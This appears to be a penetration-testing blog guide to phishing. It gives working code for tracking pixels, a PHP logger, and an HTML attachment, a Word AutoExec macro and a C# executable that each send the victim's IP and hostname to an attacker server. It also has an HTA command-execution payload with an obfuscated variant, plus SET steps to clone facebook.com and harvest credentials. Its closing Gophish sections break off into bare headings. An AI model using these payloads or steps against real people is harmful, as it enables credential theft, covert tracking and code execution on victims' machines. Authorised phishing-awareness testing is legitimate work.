Testing for social engineering through phishing techniques

Update on 20190527

Creating Look-Alike Domain Names Using CATPHISH or DNSTWIST

You can find CATPHISH at: https://github.com/ring0lab/catphish You can find DNSTWIST at: https://github.com/elceef/dnstwist

A1. Phishing through Emails

  1. Manually create an email template using HTML.

  2. Embed the following HTML code to monitor the victim’s activity when they open the email and allow images to load:

    1

    ![](http://<server_ip>/tracker.php?email=<victim_email>)

  3. Create the files ’tracker.php’ and ’log.txt’ in your web server’s document root directory (for instance, /var/www/html).

  4. Insert the following PHP code into ’tracker.php'.

    1
2
3
4
5
6
7
8
9

    <?php
$logFile = fopen("log.txt", "a");
if(isset($_GET["email"])){
$logMessage = $_GET["email"] . " opened the mail at ". date("Y/m/d h:i:sa") . ".\r\n";
}

fwrite($logFile, $logMessage);
fclose($logFile);
?>

  5. Open ’log.txt’ to view a list of email addresses that have attempted to open your phishing email.

A2. Phishing through HTML Attachments

  1. Create an HTML file named ‘promotion.html’ containing the following code:

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

     var xhr = new XMLHttpRequest();
xhr.open('GET', "http://ipinfo.io/json", true);
xhr.send();
xhr.addEventListener("readystatechange", processRequest, false);
var ip = "";

function processRequest(e) {
  if (xhr.readyState == 4 && xhr.status == 200) {
       var response = JSON.parse(xhr.responseText);
       ip = response.ip;
       country = response.country;
    }

    var log = "[" + Date() +  "] " + ip + " from " + country + " accessed to " + "" + " (" + window.location.href + ") with HTML attachment.\r\n";

    new Image().src = 'http://<server_ip>/tracker.php?attachment=' + log;
}

  2. Modify the ’tracker.php’ file created in section A1 by adding the following code:

    1
2
3

    if(isset($_GET["attachment"])){
$logMessage = $_GET["attachment"];
}

  3. Send an email to the victim, attaching the ‘promotion.html’ file.

  4. Open the ’log.txt’ file to identify individuals who have opened the HTML attachment.

A3. Phishing through VBA in Attachments

  1. Create a new document named ‘promotion.docm’ and open it.

  2. Open the Macros window by pressing Alt + F9 and create a macro named ‘AutoExec’.

  3. Paste the following code into the macro:

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

    Sub AutoExec()
Dim MyRequest As Object

    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
   
    Dim DateTime As String
    Dim IPAddress As String
    Dim Hostname As String
    Dim Log As String
   
    DateTime = Now
    IPAddress = GetIPAddress()
    Hostname = Environ("computername")
    Log = "[" + DateTime + "] Accessed to " + IPAddress + "(" + Hostname + ")" + " with attachment."
   
    ' MsgBox Log
    MyRequest.Open "GET", _
    "http:///tracker.php?attachment=" + Log
   
    ' Send Request.
    MyRequest.Send
   
    ' MsgBox IPAddress + "accessed by " + Hostname
   
End Sub

Function GetIPAddress()
    Const strComputer As String = "."   ' Computer name. Dot means local computer
    Dim objWMIService, IPConfigSet, IPConfig, IPAddress, i
    Dim strIPAddress As String

    ' Connect to the WMI service
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    ' Get all TCP/IP-enabled network adapters
    Set IPConfigSet = objWMIService.ExecQuery _
        ("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE")

    ' Get all IP addresses associated with these adapters
    For Each IPConfig In IPConfigSet
        IPAddress = IPConfig.IPAddress
        If Not IsNull(IPAddress) Then
            strIPAddress = strIPAddress & Join(IPAddress, ", ")
        End If
    Next
    GetIPAddress = strIPAddress
End Function

  4. Send the document as an attachment to the victim and then review the ’log.txt’ file.

A4. Phishing through Executable File Attachments

  1. Create a new Console App (.Net Framework) project in Microsoft Visual Studio.

  2. Replace the code in ‘Program.cs’ with the following code:

     1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

    using System;
using System.Net;
using System.Globalization;

namespace TrackMe
{
    class Program
    {
        static void Main(string[] args)
        {
            DateTime localDate = DateTime.Now;
            var culture = new CultureInfo("en-US");
            string datetime = localDate.ToString(culture);

            IPHostEntry host;
            string localIP = "";
            string hostname = Dns.GetHostName();
            host = Dns.GetHostEntry(hostname);

            //To retrieve IP Addresses
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily.ToString() == "InterNetwork")
                {
                    localIP = ip.ToString();
                }
            }

            String log = $"[{datetime}] Accessed to {localIP} ({hostname}) with attachment.";

            //To send the logs to receiver
            var client = new WebClient();
            var content = client.DownloadString($"http:///tracker.php?attachment={log}");
        }
    }
}

  3. Build the project to generate the executable (.exe) file and send this file as an attachment to the victim.

  4. Examine the ’log.txt’ file for any recorded activity.

A5. Phishing through HTA File Attachments

1
2

 a=new ActiveXObject('Wscript.Shell');
a.Run("calc.exe",0,false);

Obfuscated version:
https://www.cleancss.com/javascript-obfuscate/index.php

1

 eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=5 4(\'3.2\');1.6("8.7",0,9);',10,10,'|a|Shell|Wscript|ActiveXObject|new|Run|exe|calc|false'.split('|'),0,{}))

B1. Phishing with the Social Engineering Toolkit (SET) 

  1. Download the Social Engineering Toolkit (SET) from: https://github.com/trustedsec/social-engineer-toolkit

  2. Run the ‘setoolkit’ script and navigate through the following options:

    1. Social-Engineering Attacks
    2. Website Attack Vectors
    3. Credential Harvester Attack Method
    4. Site Cloner

    1
2
3
4
5

    root@kali:~/Downloads/social-engineer-toolkit-master# python setoolkit
set> 1
set> 2
set:webattack>3
set:webattack>2

  3. Input your server’s IP address and the website address you want to clone.

    1
2

    set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.231.129]:192.168.231.129
set:webattack> Enter the url to clone:https://www.facebook.com

  4. Wait for a victim to click the link within your phishing email and submit their credentials on the cloned page.

  5. Observe the output on your terminal for captured credentials.

  6. After completing your phishing campaign, generate a report of the captured data.

B2. Phishing with Gophish 

  1. Download the Gophish phishing framework from: https://getgophish.com.

  2. Open the ‘gophish.exe’ file to launch the application.

  3. Open your web browser and go to this address: https://127.0.0.1:3333/login to access the Gophish login page. Use the default credentials (admin:gophish) to log in.

B2.1 Configuring a Sending Profile

B2.2 Creating an Email Template

B2.3 Importing a Landing Page

[![](https

Licensed under CC BY-NC-SA 4.0
Last updated on Jul 01, 2022 17:06 +0100